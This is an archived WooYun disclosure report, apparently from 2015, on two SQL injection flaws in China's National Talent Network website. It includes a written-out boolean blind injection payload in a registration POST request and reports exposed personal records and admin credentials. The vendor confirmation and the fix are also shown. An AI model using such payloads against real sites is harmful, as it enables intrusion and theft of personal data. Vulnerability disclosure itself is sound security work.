当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144310

漏洞标题:中国国家人才网两处漏洞泄露大量信息

相关厂商:中国国家人才网

漏洞作者: ksss

提交时间:2015-10-07 21:36

修复时间:2015-11-26 17:20

公开时间:2015-11-26 17:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-07: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

放假了~

详细说明:

中国人力资源和社会保障部人才流动中心管辖的网站
霸气的域名,霸气的主办方

QQ截图20150930172718.png


两处SQL注入漏洞
#第一处
用户注册处,member_name直接放入数据库中执行,此时and 1=1 将返回用户名已被注册, and 1=2则返回注册成功,这里可以构造一个布尔盲注

http://**.**.**.**/member/register.aspx
POST:Button1=Button&member_name=hrbrhgry' AND '1'='1&real_name=hrbrhgry&__EVENTVALIDATION=/wEWBAL80e2dDgKVzvb2AwKgrb7yDQKM54rGBpCFCKSTHyW3IQ5H0oml%2bOjmpcaUI5oqdGi1%2bmFxkKgG&__VIEWSTATE=/wEPDwUJMzgyNDE3OTY0ZGRzX3RJnOVzS97IQnBoMiZml3A3QVVzZyMSOgEDefmIsg%3d%3d&__VIEWSTATEGENERATOR=C70809E0


QQ截图20150930173438.png


#第二处,参数id

http://**.**.**.**//registersuccessful.aspx?id=b18c9e79-25bb-430d-82f2-fd950aaca6f4
POST:__VIEWSTATE=/wEPDwUJOTczNTMyNjI5D2QWAgIDD2QWAgIBDw8WAh4EVGV4dAUIc2R0ZnZndGZkZGQRU8TAUqc1rgrtkwv1m1enaCFerJrJIqN6dVJTrVFaYg%3d%3d&__VIEWSTATEGENERATOR=5A3D051A


QQ截图20150930173942.png


一万多条个人信息,包括姓名、身份证号、邮箱、测评信息等等

QQ截图20150930174303.png


包括各地管理员账号密码可登录,后台功能强大

QQ截图20150930174151.png


QQ截图20150930174351.png


漏洞证明:

QQ截图20150930174655.png


QQ截图20150930174303.png


QQ截图20150930174351.png

修复方案:

参数过滤

版权声明:转载请注明来源 ksss@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-10-12 17:19

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向国家上级信息安全协调机构上报,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评价